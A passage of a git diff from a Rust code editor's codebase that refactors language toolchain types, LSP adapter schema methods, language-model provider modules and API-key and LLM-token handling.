b/crates/language_core/src/queries.rs @@ -0,0 +1,31 @@ +use std::borrow::Cow; + +pub type QueryFieldAccessor = fn(&mut LanguageQueries) -> &mut Option>; + +pub const QUERY_FILENAME_PREFIXES: &[(&str, QueryFieldAccessor)] = &[ + ("highlights", |q| &mut q.highlights), + ("brackets", |q| &mut q.brackets), + ("outline", |q| &mut q.outline), + ("indents", |q| &mut q.indents), + ("injections", |q| &mut q.injections), + ("overrides", |q| &mut q.overrides), + ("redactions", |q| &mut q.redactions), + ("runnables", |q| &mut q.runnables), + ("debugger", |q| &mut q.debugger), + ("textobjects", |q| &mut q.text_objects), +]; + +/// Tree-sitter language queries for a given language. +#[derive(Debug, Default)] +pub struct LanguageQueries { + pub highlights: Option>, + pub brackets: Option>, + pub indents: Option>, + pub outline: Option>, + pub injections: Option>, + pub overrides: Option>, + pub redactions: Option>, + pub runnables: Option>, + pub text_objects: Option>, + pub debugger: Option>, +} diff --git a/crates/language_core/src/toolchain.rs b/crates/language_core/src/toolchain.rs new file mode 100644 index 0000000000000000000000000000000000000000..a021cb86bd36295a065b16281209c5fc3b63cffc --- /dev/null +++ b/crates/language_core/src/toolchain.rs @@ -0,0 +1,124 @@ +//! Provides core data types for language toolchains. +//! +//! A language can have associated toolchains, +//! which is a set of tools used to interact with the projects written in said language. +//! For example, a Python project can have an associated virtual environment; a Rust project can have a toolchain override. + +use std::{path::Path, sync::Arc}; + +use gpui::SharedString; +use util::rel_path::RelPath; + +use crate::{LanguageName, ManifestName}; + +/// Represents a single toolchain. +#[derive(Clone, Eq, Debug)] +pub struct Toolchain { + /// User-facing label + pub name: SharedString, + /// Absolute path + pub path: SharedString, + pub language_name: LanguageName, + /// Full toolchain data (including language-specific details) + pub as_json: serde_json::Value, +} + +impl std::hash::Hash for Toolchain { + fn hash(&self, state: &mut H) { + let Self { + name, + path, + language_name, + as_json: _, + } = self; + name.hash(state); + path.hash(state); + language_name.hash(state); + } +} + +impl PartialEq for Toolchain { + fn eq(&self, other: &Self) -> bool { + let Self { + name, + path, + language_name, + as_json: _, + } = self; + // Do not use as_json for comparisons; it shouldn't impact equality, as it's not user-surfaced. + // Thus, there could be multiple entries that look the same in the UI. + (name, path, language_name).eq(&(&other.name, &other.path, &other.language_name)) + } +} + +/// Declares a scope of a toolchain added by user. +/// +/// When the user adds a toolchain, we give them an option to see that toolchain in: +/// - All of their projects +/// - A project they're currently in. +/// - Only in the subproject they're currently in. +#[derive(Clone, Debug, Eq, PartialEq, Ord, PartialOrd)] +pub enum ToolchainScope { + Subproject(Arc, Arc), + Project, + /// Available in all projects on this box. It wouldn't make sense to show suggestions across machines. + Global, +} + +impl ToolchainScope { + pub fn label(&self) -> &'static str { + match self { + ToolchainScope::Subproject(_, _) => "Subproject", + ToolchainScope::Project => "Project", + ToolchainScope::Global => "Global", + } + } + + pub fn description(&self) -> &'static str { + match self { + ToolchainScope::Subproject(_, _) => { + "Available only in the subproject you're currently in." + } + ToolchainScope::Project => "Available in all locations in your current project.", + ToolchainScope::Global => "Available in all of your projects on this machine.", + } + } +} + +#[derive(Clone, PartialEq, Eq, Hash)] +pub struct ToolchainMetadata { + /// Returns a term which we should use in UI to refer to toolchains produced by a given `ToolchainLister`. + pub term: SharedString, + /// A user-facing placeholder describing the semantic meaning of a path to a new toolchain. + pub new_toolchain_placeholder: SharedString, + /// The name of the manifest file for this toolchain. + pub manifest_name: ManifestName, +} + +type DefaultIndex = usize; +#[derive(Default, Clone, Debug)] +pub struct ToolchainList { + pub toolchains: Vec, + pub default: Option, + pub groups: Box<[(usize, SharedString)]>, +} + +impl ToolchainList { + pub fn toolchains(&self) -> &[Toolchain] { + &self.toolchains + } + pub fn default_toolchain(&self) -> Option { + self.default.and_then(|ix| self.toolchains.get(ix)).cloned() + } + pub fn group_for_index(&self, index: usize) -> Option<(usize, SharedString)> { + if index >= self.toolchains.len() { + return None; + } + let first_equal_or_greater = self + .groups + .partition_point(|(group_lower_bound, _)| group_lower_bound <= &index); + self.groups + .get(first_equal_or_greater.checked_sub(1)?) + .cloned() + } +} diff --git a/crates/language_extension/src/extension_lsp_adapter.rs b/crates/language_extension/src/extension_lsp_adapter.rs index c2062a294d75657b1421982974019454ecba4aa3..3c28e07e6b306ea3a0ce644ac688f9fab8d6125f 100644 --- a/crates/language_extension/src/extension_lsp_adapter.rs +++ b/crates/language_extension/src/extension_lsp_adapter.rs @@ -309,6 +309,7 @@ impl LspAdapter for ExtensionLspAdapter { async fn initialization_options( self: Arc, delegate: &Arc, + _: &mut AsyncApp, ) -> Result> { let delegate = Arc::new(WorktreeDelegateAdapter(delegate.clone())) as _; let json_options = self @@ -349,6 +350,44 @@ impl LspAdapter for ExtensionLspAdapter { }) } + async fn initialization_options_schema( + self: Arc, + delegate: &Arc, + _cached_binary: OwnedMutexGuard>, + _cx: &mut AsyncApp, + ) -> Option { + let delegate = Arc::new(WorktreeDelegateAdapter(delegate.clone())) as _; + let json_schema: Option = self + .extension + .language_server_initialization_options_schema( + self.language_server_id.clone(), + delegate, + ) + .await + .ok() + .flatten(); + json_schema.and_then(|s| serde_json::from_str(&s).ok()) + } + + async fn settings_schema( + self: Arc, + delegate: &Arc, + _cached_binary: OwnedMutexGuard>, + _cx: &mut AsyncApp, + ) -> Option { + let delegate = Arc::new(WorktreeDelegateAdapter(delegate.clone())) as _; + let json_schema: Option = self + .extension + .language_server_workspace_configuration_schema( + self.language_server_id.clone(), + delegate, + ) + .await + .ok() + .flatten(); + json_schema.and_then(|s| serde_json::from_str(&s).ok()) + } + async fn additional_initialization_options( self: Arc, target_language_server_id: LanguageServerName, @@ -508,15 +547,16 @@ fn build_code_label( text.push_str(code_span); } extension::CodeLabelSpan::Literal(span) => { - let highlight_id = language + if let Some(highlight_id) = language .grammar() .zip(span.highlight_name.as_ref()) .and_then(|(grammar, highlight_name)| { grammar.highlight_id_for_name(highlight_name) }) - .unwrap_or_default(); - let ix = text.len(); - runs.push((ix..ix + span.text.len(), highlight_id)); + { + let ix = text.len(); + runs.push((ix..ix + span.text.len(), highlight_id)); + } text.push_str(&span.text); } } @@ -644,7 +684,7 @@ fn test_build_code_label() { ); let code_runs = code_ranges .into_iter() - .map(|range| (range, HighlightId(0))) + .map(|range| (range, HighlightId::new(0))) .collect::>(); let label = build_code_label( @@ -667,7 +707,7 @@ fn test_build_code_label() { marked_text_ranges("pqrs.tuv: «fn»(«Bcd»(«Efgh»)) -> «Ijklm»", false); let label_runs = label_ranges .into_iter() - .map(|range| (range, HighlightId(0))) + .map(|range| (range, HighlightId::new(0))) .collect::>(); assert_eq!( @@ -683,7 +723,7 @@ fn test_build_code_label_with_invalid_ranges() { let (code, code_ranges) = marked_text_ranges("const «a»: «B» = '🏀'", false); let code_runs = code_ranges .into_iter() - .map(|range| (range, HighlightId(0))) + .map(|range| (range, HighlightId::new(0))) .collect::>(); // A span uses a code range that is invalid because it starts inside of diff --git a/crates/language_model/Cargo.toml b/crates/language_model/Cargo.toml index a586458e41bab0b12c5f92849659ed33c18f5a68..4712d86dff6c44f9cdd8576a08349ccfa7d0ecca 100644 --- a/crates/language_model/Cargo.toml +++ b/crates/language_model/Cargo.toml @@ -20,11 +20,11 @@ anthropic = { workspace = true, features = ["schemars"] } anyhow.workspace = true credentials_provider.workspace = true base64.workspace = true -client.workspace = true cloud_api_client.workspace = true cloud_api_types.workspace = true cloud_llm_client.workspace = true collections.workspace = true +env_var.workspace = true futures.workspace = true gpui.workspace = true http_client.workspace = true @@ -34,15 +34,12 @@ log.workspace = true open_ai = { workspace = true, features = ["schemars"] } open_router.workspace = true parking_lot.workspace = true -proto.workspace = true schemars.workspace = true serde.workspace = true serde_json.workspace = true -settings.workspace = true smol.workspace = true thiserror.workspace = true util.workspace = true -zed_env_vars.workspace = true [dev-dependencies] gpui = { workspace = true, features = ["test-support"] } diff --git a/crates/language_model/src/api_key.rs b/crates/language_model/src/api_key.rs index 754fde069295d8799820020bef286b1a1a3c590c..4be5a64d3db6231c98b830a524d5e299faace457 100644 --- a/crates/language_model/src/api_key.rs +++ b/crates/language_model/src/api_key.rs @@ -1,5 +1,6 @@ use anyhow::{Result, anyhow}; use credentials_provider::CredentialsProvider; +use env_var::EnvVar; use futures::{FutureExt, future}; use gpui::{AsyncApp, Context, SharedString, Task}; use std::{ @@ -7,7 +8,6 @@ use std::{ sync::Arc, }; use util::ResultExt as _; -use zed_env_vars::EnvVar; use crate::AuthenticateError; @@ -101,6 +101,7 @@ impl ApiKeyState { url: SharedString, key: Option, get_this: impl Fn(&mut Ent) -> &mut Self + 'static, + provider: Arc, cx: &Context, ) -> Task> { if self.is_from_env_var() { @@ -108,18 +109,14 @@ impl ApiKeyState { "bug: attempted to store API key in system keychain when API key is from env var", ))); } - let credentials_provider = ::global(cx); cx.spawn(async move |ent, cx| { if let Some(key) = &key { - credentials_provider + provider .write_credentials(&url, "Bearer", key.as_bytes(), cx) .await .log_err(); } else { - credentials_provider - .delete_credentials(&url, cx) - .await - .log_err(); + provider.delete_credentials(&url, cx).await.log_err(); } ent.update(cx, |ent, cx| { let this = get_this(ent); @@ -144,12 +141,13 @@ impl ApiKeyState { &mut self, url: SharedString, get_this: impl Fn(&mut Ent) -> &mut Self + Clone + 'static, + provider: Arc, cx: &mut Context, ) { if url != self.url { if !self.is_from_env_var() { // loading will continue even though this result task is dropped - let _task = self.load_if_needed(url, get_this, cx); + let _task = self.load_if_needed(url, get_this, provider, cx); } } } @@ -163,6 +161,7 @@ impl ApiKeyState { &mut self, url: SharedString, get_this: impl Fn(&mut Ent) -> &mut Self + Clone + 'static, + provider: Arc, cx: &mut Context, ) -> Task> { if let LoadStatus::Loaded { .. } = &self.load_status @@ -185,7 +184,7 @@ impl ApiKeyState { let task = if let Some(load_task) = &self.load_task { load_task.clone() } else { - let load_task = Self::load(url.clone(), get_this.clone(), cx).shared(); + let load_task = Self::load(url.clone(), get_this.clone(), provider, cx).shared(); self.url = url; self.load_status = LoadStatus::NotPresent; self.load_task = Some(load_task.clone()); @@ -206,14 +205,13 @@ impl ApiKeyState { fn load( url: SharedString, get_this: impl Fn(&mut Ent) -> &mut Self + 'static, + provider: Arc, cx: &Context, ) -> Task<()> { - let credentials_provider = ::global(cx); cx.spawn({ async move |ent, cx| { let load_status = - ApiKey::load_from_system_keychain_impl(&url, credentials_provider.as_ref(), cx) - .await; + ApiKey::load_from_system_keychain_impl(&url, provider.as_ref(), cx).await; ent.update(cx, |ent, cx| { let this = get_this(ent); this.url = url; diff --git a/crates/language_model/src/fake_provider.rs b/crates/language_model/src/fake_provider.rs index ae01084a2657abdc86e7510aa49663cf98aabe70..50037f31facbac446de7ecf38536d1e4a24c7867 100644 --- a/crates/language_model/src/fake_provider.rs +++ b/crates/language_model/src/fake_provider.rs @@ -125,6 +125,7 @@ pub struct FakeLanguageModel { >, forbid_requests: AtomicBool, supports_thinking: AtomicBool, + supports_streaming_tools: AtomicBool, } impl Default for FakeLanguageModel { @@ -137,6 +138,7 @@ impl Default for FakeLanguageModel { current_completion_txs: Mutex::new(Vec::new()), forbid_requests: AtomicBool::new(false), supports_thinking: AtomicBool::new(false), + supports_streaming_tools: AtomicBool::new(false), } } } @@ -169,6 +171,10 @@ impl FakeLanguageModel { self.supports_thinking.store(supports, SeqCst); } + pub fn set_supports_streaming_tools(&self, supports: bool) { + self.supports_streaming_tools.store(supports, SeqCst); + } + pub fn pending_completions(&self) -> Vec { self.current_completion_txs .lock() @@ -282,6 +288,10 @@ impl LanguageModel for FakeLanguageModel { self.supports_thinking.load(SeqCst) } + fn supports_streaming_tools(&self) -> bool { + self.supports_streaming_tools.load(SeqCst) + } + fn telemetry_id(&self) -> String { "fake".to_string() } diff --git a/crates/language_model/src/language_model.rs b/crates/language_model/src/language_model.rs index c403774499c9dcb384e93cf19367dc28e336aa60..3f309b7b1d4152c54324efaaf0ad3bdb7035eea4 100644 --- a/crates/language_model/src/language_model.rs +++ b/crates/language_model/src/language_model.rs @@ -1,28 +1,24 @@ mod api_key; mod model; +mod provider; mod rate_limiter; mod registry; mod request; mod role; -mod telemetry; pub mod tool_schema; #[cfg(any(test, feature = "test-support"))] pub mod fake_provider; -use anthropic::{AnthropicError, parse_prompt_too_long}; use anyhow::{Result, anyhow}; -use client::Client; use cloud_llm_client::CompletionRequestStatus; use futures::FutureExt; use futures::{StreamExt, future::BoxFuture, stream::BoxStream}; use gpui::{AnyView, App, AsyncApp, SharedString, Task, Window}; use http_client::{StatusCode, http}; use icons::IconName; -use open_router::OpenRouterError; use parking_lot::Mutex; use serde::{Deserialize, Serialize}; -pub use settings::LanguageModelCacheConfiguration; use std::ops::{Add, Sub}; use std::str::FromStr; use std::sync::Arc; @@ -37,37 +33,19 @@ pub use crate::rate_limiter::*; pub use crate::registry::*; pub use crate::request::*; pub use crate::role::*; -pub use crate::telemetry::*; pub use crate::tool_schema::LanguageModelToolSchemaFormat; -pub use zed_env_vars::{EnvVar, env_var}; +pub use env_var::{EnvVar, env_var}; +pub use provider::*; -pub const ANTHROPIC_PROVIDER_ID: LanguageModelProviderId = - LanguageModelProviderId::new("anthropic"); -pub const ANTHROPIC_PROVIDER_NAME: LanguageModelProviderName = - LanguageModelProviderName::new("Anthropic"); - -pub const GOOGLE_PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("google"); -pub const GOOGLE_PROVIDER_NAME: LanguageModelProviderName = - LanguageModelProviderName::new("Google AI"); - -pub const OPEN_AI_PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("openai"); -pub const OPEN_AI_PROVIDER_NAME: LanguageModelProviderName = - LanguageModelProviderName::new("OpenAI"); - -pub const X_AI_PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("x_ai"); -pub const X_AI_PROVIDER_NAME: LanguageModelProviderName = LanguageModelProviderName::new("xAI"); - -pub const ZED_CLOUD_PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("zed.dev"); -pub const ZED_CLOUD_PROVIDER_NAME: LanguageModelProviderName = - LanguageModelProviderName::new("Zed"); - -pub fn init(client: Arc, cx: &mut App) { - init_settings(cx); - RefreshLlmTokenListener::register(client, cx); +pub fn init(cx: &mut App) { + registry::init(cx); } -pub fn init_settings(cx: &mut App) { - registry::init(cx); +#[derive(Clone, Debug)] +pub struct LanguageModelCacheConfiguration { + pub max_cache_anchors: usize, + pub should_speculate: bool, + pub min_total_token: u64, } /// A completion event from a language model. @@ -309,165 +287,6 @@ impl LanguageModelCompletionError { } } -impl From for LanguageModelCompletionError { - fn from(error: AnthropicError) -> Self { - let provider = ANTHROPIC_PROVIDER_NAME; - match error { - AnthropicError::SerializeRequest(error) => Self::SerializeRequest { provider, error }, - AnthropicError::BuildRequestBody(error) => Self::BuildRequestBody { provider, error }, - AnthropicError::HttpSend(error) => Self::HttpSend { provider, error }, - AnthropicError::DeserializeResponse(error) => { - Self::DeserializeResponse { provider, error } - } - AnthropicError::ReadResponse(error) => Self::ApiReadResponseError { provider, error }, - AnthropicError::HttpResponseError { - status_code, - message, - } => Self::HttpResponseError { - provider, - status_code, - message, - }, - AnthropicError::RateLimit { retry_after } => Self::RateLimitExceeded { - provider, - retry_after: Some(retry_after), - }, - AnthropicError::ServerOverloaded { retry_after } => Self::ServerOverloaded { - provider, - retry_after, - }, - AnthropicError::ApiError(api_error) => api_error.into(), - } - } -} - -impl From for LanguageModelCompletionError { - fn from(error: anthropic::ApiError) -> Self { - use anthropic::ApiErrorCode::*; - let provider = ANTHROPIC_PROVIDER_NAME; - match error.code() { - Some(code) => match code { - InvalidRequestError => Self::BadRequestFormat { - provider, - message: error.message, - }, - AuthenticationError => Self::AuthenticationError { - provider, - message: error.message, - }, - PermissionError => Self::PermissionError { - provider, - message: error.message, - }, - NotFoundError => Self::ApiEndpointNotFound { provider }, - RequestTooLarge => Self::PromptTooLarge { - tokens: parse_prompt_too_long(&error.message), - }, - RateLimitError => Self::RateLimitExceeded { - provider, - retry_after: None, - }, - ApiError => Self::ApiInternalServerError { - provider, - message: error.message, - }, - OverloadedError => Self::ServerOverloaded { - provider, - retry_after: None, - }, - }, - None => Self::Other(error.into()), - } - } -} - -impl From for LanguageModelCompletionError { - fn from(error: open_ai::RequestError) -> Self { - match error { - open_ai::RequestError::HttpResponseError { - provider, - status_code, - body, - headers, - } => { - let retry_after = headers - .get(http::header::RETRY_AFTER) - .and_then(|val| val.to_str().ok()?.parse::().ok()) - .map(Duration::from_secs); - - Self::from_http_status(provider.into(), status_code, body, retry_after) - } - open_ai::RequestError::Other(e) => Self::Other(e), - } - } -} - -impl From for LanguageModelCompletionError { - fn from(error: OpenRouterError) -> Self { - let provider = LanguageModelProviderName::new("OpenRouter"); - match error { - OpenRouterError::SerializeRequest(error) => Self::SerializeRequest { provider, error }, - OpenRouterError::BuildRequestBody(error) => Self::BuildRequestBody { provider, error }, - OpenRouterError::HttpSend(error) => Self::HttpSend { provider, error }, - OpenRouterError::DeserializeResponse(error) => { - Self::DeserializeResponse { provider, error } - } - OpenRouterError::ReadResponse(error) => Self::ApiReadResponseError { provider, error }, - OpenRouterError::RateLimit { retry_after } => Self::RateLimitExceeded { - provider, - retry_after: Some(retry_after), - }, - OpenRouterError::ServerOverloaded { retry_after } => Self::ServerOverloaded { - provider, - retry_after, - }, - OpenRouterError::ApiError(api_error) => api_error.into(), - } - } -} - -impl From for LanguageModelCompletionError { - fn from(error: open_router::ApiError) -> Self { - use open_router::ApiErrorCode::*; - let provider = LanguageModelProviderName::new("OpenRouter"); - match error.code { - InvalidRequestError => Self::BadRequestFormat { - provider, - message: error.message, - }, - AuthenticationError => Self::AuthenticationError { - provider, - message: error.message, - }, - PaymentRequiredError => Self::AuthenticationError { - provider, - message: format!("Payment required: {}", error.message), - }, - PermissionError => Self::PermissionError { - provider, - message: error.message, - }, - RequestTimedOut => Self::HttpResponseError { - provider, - status_code: StatusCode::REQUEST_TIMEOUT, - message: error.message, - }, - RateLimitError => Self::RateLimitExceeded { - provider, - retry_after: None, - }, - ApiError => Self::ApiInternalServerError { - provider, - message: error.message, - }, - OverloadedError => Self::ServerOverloaded { - provider, - retry_after: None, - }, - } - } -} - #[derive(Debug, PartialEq, Clone, Copy, Serialize, Deserialize)] #[serde(rename_all = "snake_case")] pub enum StopReason { @@ -856,16 +675,6 @@ pub enum ConfigurationViewTargetAgent { Other(SharedString), } -#[derive(PartialEq, Eq)] -pub enum LanguageModelProviderTosView { - /// When there are some past interactions in the Agent Panel. - ThreadEmptyState, - /// When there are no past interactions in the Agent Panel. - ThreadFreshStart, - TextThreadPopup, - Configuration, -} - pub trait LanguageModelProviderState: 'static { type ObservableEntity; diff --git a/crates/language_model/src/model/mod.rs b/crates/language_model/src/model.rs similarity index 100% rename from crates/language_model/src/model/mod.rs rename to crates/language_model/src/model.rs diff --git a/crates/language_model/src/model/cloud_model.rs b/crates/language_model/src/model/cloud_model.rs index 18e099b4d6fc62867bf35fbd1d4573093af44744..db926aab1f70a46a4e70b1b67c2c9e4c4f465c2c 100644 --- a/crates/language_model/src/model/cloud_model.rs +++ b/crates/language_model/src/model/cloud_model.rs @@ -1,12 +1,9 @@ use std::fmt; use std::sync::Arc; -use anyhow::{Context as _, Result}; -use client::Client; use cloud_api_client::ClientApiError; -use cloud_api_types::websocket_protocol::MessageToClient; -use cloud_llm_client::{EXPIRED_LLM_TOKEN_HEADER_NAME, OUTDATED_LLM_TOKEN_HEADER_NAME}; -use gpui::{App, AppContext as _, Context, Entity, EventEmitter, Global, ReadGlobal as _}; +use cloud_api_client::CloudApiClient; +use cloud_api_types::OrganizationId; use smol::lock::{RwLock, RwLockUpgradableReadGuard, RwLockWriteGuard}; use thiserror::Error; @@ -26,92 +23,65 @@ impl fmt::Display for PaymentRequiredError { pub struct LlmApiToken(Arc>>); impl LlmApiToken { - pub async fn acquire(&self, client: &Arc) -> Result { + pub async fn acquire( + &self, + client: &CloudApiClient, + system_id: Option, + organization_id: Option, + ) -> Result { let lock = self.0.upgradable_read().await; if let Some(token) = lock.as_ref() { Ok(token.to_string()) } else { - Self::fetch(RwLockUpgradableReadGuard::upgrade(lock).await, client).await + Self::fetch( + RwLockUpgradableReadGuard::upgrade(lock).await, + client, + system_id, + organization_id, + ) + .await } } - pub async fn refresh(&self, client: &Arc) -> Result { - Self::fetch(self.0.write().await, client).await + pub async fn refresh( + &self, + client: &CloudApiClient, + system_id: Option, + organization_id: Option, + ) -> Result { + Self::fetch(self.0.write().await, client, system_id, organization_id).await + } + + /// Clears the existing token before attempting to fetch a new one. + /// + /// Used when switching organizations so that a failed refresh doesn't + /// leave a token for the wrong organization. + pub async fn clear_and_refresh( + &self, + client: &CloudApiClient, + system_id: Option, + organization_id: Option, + ) -> Result { + let mut lock = self.0.write().await; + *lock = None; + Self::fetch(lock, client, system_id, organization_id).await } async fn fetch( mut lock: RwLockWriteGuard<'_, Option>, - client: &Arc, - ) -> Result { - let system_id = client - .telemetry() - .system_id() - .map(|system_id| system_id.to_string()); - - let result = client.cloud_client().create_llm_token(system_id).await; + client: &CloudApiClient, + system_id: Option, + organization_id: Option, + ) -> Result { + let result = client.create_llm_token(system_id, organization_id).await; match result { Ok(response) => { *lock = Some(response.token.0.clone()); Ok(response.token.0) } - Err(err) => match err { - ClientApiError::Unauthorized => { - client.request_sign_out(); - Err(err).context("Failed to create LLM token") - } - ClientApiError::Other(err) => Err(err), - }, - } - } -} - -pub trait NeedsLlmTokenRefresh { - /// Returns whether the LLM token needs to be refreshed. - fn needs_llm_token_refresh(&self) -> bool; -} - -impl NeedsLlmTokenRefresh for http_client::Response { - fn needs_llm_token_refresh(&self) -> bool { - self.headers().get(EXPIRED_LLM_TOKEN_HEADER_NAME).is_some() - || self.headers().get(OUTDATED_LLM_TOKEN_HEADER_NAME).is_some() - } -} - -struct GlobalRefreshLlmTokenListener(Entity); - -impl Global for GlobalRefreshLlmTokenListener {} - -pub struct RefreshLlmTokenEvent; - -pub struct RefreshLlmTokenListener; - -impl EventEmitter for RefreshLlmTokenListener {} - -impl RefreshLlmTokenListener { - pub fn register(client: Arc, cx: &mut App) { - let listener = cx.new(|cx| RefreshLlmTokenListener::new(client, cx)); - cx.set_global(GlobalRefreshLlmTokenListener(listener)); - } - - pub fn global(cx: &App) -> Entity { - GlobalRefreshLlmTokenListener::global(cx).0.clone() - } - - fn new(client: Arc, cx: &mut Context) -> Self { - client.add_message_to_client_handler({ - let this = cx.entity(); - move |message, cx| { - Self::handle_refresh_llm_token(this.clone(), message, cx); - } - }); - - Self - } - - fn handle_refresh_llm_token(this: Entity, message: &MessageToClient, cx: &mut App) { - match message { - MessageToClient::UserUpdated => { - this.update(cx, |_this, cx| cx.emit(RefreshLlmTokenEvent)); + Err(err) => { + *lock = None; + Err(err) } } } diff --git a/crates/language_model/src/provider.rs b/crates/language_model/src/provider.rs new file mode 100644 index 0000000000000000000000000000000000000000..707d8e2d618894e2898e253450dbfbb5e9483bba --- /dev/null +++ b/crates/language_model/src/provider.rs @@ -0,0 +1,12 @@ +pub mod anthropic; +pub mod google; +pub mod open_ai; +pub mod open_router; +pub mod x_ai; +pub mod zed; + +pub use anthropic::*; +pub use google::*; +pub use open_ai::*; +pub use x_ai::*; +pub use zed::*; diff --git a/crates/language_model/src/provider/anthropic.rs b/crates/language_model/src/provider/anthropic.rs new file mode 100644 index 0000000000000000000000000000000000000000..0878be2070fdbb9e57145684f59c962a32bb9fd2 --- /dev/null +++ b/crates/language_model/src/provider/anthropic.rs @@ -0,0 +1,80 @@ +use crate::{LanguageModelCompletionError, LanguageModelProviderId, LanguageModelProviderName}; +use anthropic::AnthropicError; +pub use anthropic::parse_prompt_too_long; + +pub const ANTHROPIC_PROVIDER_ID: LanguageModelProviderId = + LanguageModelProviderId::new("anthropic"); +pub const ANTHROPIC_PROVIDER_NAME: LanguageModelProviderName = + LanguageModelProviderName::new("Anthropic"); + +impl From for LanguageModelCompletionError { + fn from(error: AnthropicError) -> Self { + let provider = ANTHROPIC_PROVIDER_NAME; + match error { + AnthropicError::SerializeRequest(error) => Self::SerializeRequest { provider, error }, + AnthropicError::BuildRequestBody(error) => Self::BuildRequestBody { provider, error }, + AnthropicError::HttpSend(error) => Self::HttpSend { provider, error }, + AnthropicError::DeserializeResponse(error) => { + Self::DeserializeResponse { provider, error } + } + AnthropicError::ReadResponse(error) => Self::ApiReadResponseError { provider, error }, + AnthropicError::HttpResponseError { + status_code, + message, + } => Self::HttpResponseError { + provider, + status_code, + message, + }, + AnthropicError::RateLimit { retry_after } => Self::RateLimitExceeded { + provider, + retry_after: Some(retry_after), + }, + AnthropicError::ServerOverloaded { retry_after } => Self::ServerOverloaded { + provider, + retry_after, + }, + AnthropicError::ApiError(api_error) => api_error.into(), + } + } +} + +impl From for LanguageModelCompletionError { + fn from(error: anthropic::ApiError) -> Self { + use anthropic::ApiErrorCode::*; + let provider = ANTHROPIC_PROVIDER_NAME; + match error.code() { + Some(code) => match code { + InvalidRequestError => Self::BadRequestFormat { + provider, + message: error.message, + }, + AuthenticationError => Self::AuthenticationError { + provider, + message: error.message, + }, + PermissionError => Self::PermissionError { + provider, + message: error.message, + }, + NotFoundError => Self::ApiEndpointNotFound { provider }, + RequestTooLarge => Self::PromptTooLarge { + tokens: parse_prompt_too_long(&error.message), + }, + RateLimitError => Self::RateLimitExceeded { + provider, + retry_after: None, + }, + ApiError => Self::ApiInternalServerError { + provider, + message: error.message, + }, + OverloadedError => Self::ServerOverloaded { + provider, + retry_after: None, + }, + }, + None => Self::Other(error.into()), + } + } +} diff --git a/crates/language_model/src/provider/google.rs b/crates/language_model/src/provider/google.rs new file mode 100644 index 0000000000000000000000000000000000000000..1caee496b519f395dd10744b127bc29ee893849f --- /dev/null +++ b/crates/language_model/src/provider/google.rs @@ -0,0 +1,5 @@ +use crate::{LanguageModelProviderId, LanguageModelProviderName}; + +pub const GOOGLE_PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("google"); +pub const GOOGLE_PROVIDER_NAME: LanguageModelProviderName = + LanguageModelProviderName::new("Google AI"); diff --git a/crates/language_model/src/provider/open_ai.rs b/crates/language_model/src/provider/open_ai.rs new file mode 100644 index 0000000000000000000000000000000000000000..3796eb9a3aef78628c52d92e92fabb3812249e04 --- /dev/null +++ b/crates/language_model/src/provider/open_ai.rs @@ -0,0 +1,28 @@ +use crate::{LanguageModelCompletionError, LanguageModelProviderId, LanguageModelProviderName}; +use http_client::http; +use std::time::Duration; + +pub const OPEN_AI_PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("openai"); +pub const OPEN_AI_PROVIDER_NAME: LanguageModelProviderName = + LanguageModelProviderName::new("OpenAI"); + +impl From for LanguageModelCompletionError { + fn from(error: open_ai::RequestError) -> Self { + match error { + open_ai::RequestError::HttpResponseError { + provider, + status_code, + body, + headers, + } => { + let retry_after = headers + .get(http::header::RETRY_AFTER) + .and_then(|val| val.to_str().ok()?.parse::().ok()) + .map(Duration::from_secs); + + Self::from_http_status(provider.into(), status_code, body, retry_after) + } + open_ai::RequestError::Other(e) => Self::Other(e), + } + } +} diff --git a/crates/language_model/src/provider/open_router.rs b/crates/language_model/src/provider/open_router.rs new file mode 100644 index 0000000000000000000000000000000000000000..809e22f1fec0f2d205caa3ebbcb0baaf129b062c --- /dev/null +++ b/crates/language_model/src/provider/open_router.rs @@ -0,0 +1,69 @@ +use crate::{LanguageModelCompletionError, LanguageModelProviderName}; +use http_client::StatusCode; +use open_router::OpenRouterError; + +impl From for LanguageModelCompletionError { + fn from(error: OpenRouterError) -> Self { + let provider = LanguageModelProviderName::new("OpenRouter"); + match error { + OpenRouterError::SerializeRequest(error) => Self::SerializeRequest { provider, error }, + OpenRouterError::BuildRequestBody(error) => Self::BuildRequestBody { provider, error }, + OpenRouterError::HttpSend(error) => Self::HttpSend { provider, error }, + OpenRouterError::DeserializeResponse(error) => { + Self::DeserializeResponse { provider, error } + } + OpenRouterError::ReadResponse(error) => Self::ApiReadResponseError { provider, error }, + OpenRouterError::RateLimit { retry_after } => Self::RateLimitExceeded { + provider, + retry_after: Some(retry_after), + }, + OpenRouterError::ServerOverloaded { retry_after } => Self::ServerOverloaded { + provider, + retry_after, + }, + OpenRouterError::ApiError(api_error) => api_error.into(), + } + } +} + +impl From for LanguageModelCompletionError { + fn from(error: open_router::ApiError) -> Self { + use open_router::ApiErrorCode::*; + let provider = LanguageModelProviderName::new("OpenRouter"); + match error.code { + InvalidRequestError => Self::BadRequestFormat { + provider, + message: error.message, + }, + AuthenticationError => Self::AuthenticationError { + provider, + message: error.message, + }, + PaymentRequiredError => Self::AuthenticationError { + provider, + message: format!("Payment required: {}", error.message), + }, + PermissionError => Self::PermissionError { + provider, + message: error.message, + }, + RequestTimedOut => Self::HttpResponseError { + provider, + status_code: StatusCode::REQUEST_TIMEOUT, + message: error.message, + }, + RateLimitError => Self::RateLimitExceeded { + provider, + retry_after: None, + }, + ApiError => Self::ApiInternalServerError { + provider, + message: error.message, + }, + OverloadedError => Self::ServerOverloaded { + provider, + retry_after: None, + }, + } + } +} diff --git a/crates/language_model/src/provider/x_ai.rs b/crates/language_model/src/provider/x_ai.rs new file mode 100644 index 0000000000000000000000000000000000000000..3d0f794fa4087a4beeb4a9b6253d016a9b592f0e --- /dev/null +++ b/crates/language_model/src/provider/x_ai.rs @@ -0,0 +1,4 @@ +use crate::{LanguageModelProviderId, LanguageModelProviderName}; + +pub const X_AI_PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("x_ai"); +pub const X_AI_PROVIDER_NAME: LanguageModelProviderName = LanguageModelProviderName::new("xAI"); diff --git a/crates/language_model/src/provider/zed.rs b/crates/language_model/src/provider/zed.rs new file mode 100644 index 